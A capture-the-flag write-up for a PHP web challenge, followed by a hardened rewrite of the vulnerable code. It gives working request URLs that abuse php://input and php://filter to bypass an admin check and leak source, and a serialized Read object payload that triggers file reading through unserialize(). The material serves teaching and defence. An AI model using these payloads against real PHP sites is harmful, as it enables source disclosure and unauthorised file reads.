web21
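Open the developer tools (F12) and take a look at the page source.
From what it shows, this looks like a code-audit challenge that combines PHP pseudo-protocols (stream wrappers), a POST request, and a file-inclusion vulnerability.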
http://123.206.31.85:10021/?user=php://input&file=php://filter/read=convert.base64-encode/resource=index.php
This leaks the source of index.php:
<?php
error_reporting(E_ALL & ~E_NOTICE);
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->
http://123.206.31.85:10021/?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php
In the same way, dump the source of class.php as well:
<?php
error_reporting(E_ALL & ~E_NOTICE);
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
?>
So we construct a serialized Read object.
Submitting it returns the flag.
$pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}
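
Each weakness chained above (an admin check that reads a caller-named stream, include() on a caller-supplied path guarded only by a substring blacklist, and unserialize() on request data) has a direct fix. The hardened counterpart below is an added example, not code from the challenge or from this writeup; ALLOWED_PAGES, is_admin(), resolve_page(), decode_pass() and the session key "role" are hypothetical names, and the inputs at the bottom are constructed from the requests shown on this page.

```php
<?php
// Added example: hardened counterpart to the challenge's index.php.
// All function and constant names here are hypothetical.
declare(strict_types=1);

// Only these logical names may be included; the values are fixed paths.
const ALLOWED_PAGES = ['class' => __DIR__ . '/class.php'];

function is_admin(array $session): bool
{
    // Identity comes from server-side session state, never from
    // file_get_contents() on a caller-supplied stream such as php://input.
    return ($session['role'] ?? '') === 'admin';
}

function resolve_page(string $name): ?string
{
    // An allowlist lookup rejects php://filter, php://input and path
    // traversal by construction, instead of blacklisting /f1a9/ alone.
    return ALLOWED_PAGES[$name] ?? null;
}

function decode_pass(string $raw): ?string
{
    // allowed_classes => false maps every serialized object to
    // __PHP_Incomplete_Class, so Read::__toString() is never reachable.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    // Accept plain strings only; objects, arrays and failures are dropped.
    return is_string($value) ? $value : null;
}

// Constructed inputs mirroring the requests in this writeup.
$files = [
    'php://filter/read=convert.base64-encode/resource=index.php',
    '../f1a9.php',
    'class',
];
foreach ($files as $f) {
    printf("%-60s => %s\n", $f, resolve_page($f) ?? 'rejected');
}

// The serialized Read object from the writeup, then a harmless string.
var_dump(decode_pass('O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}'));
var_dump(decode_pass('s:5:"hello";'));

// A request without an authenticated session is not treated as admin.
var_dump(is_admin([]));
```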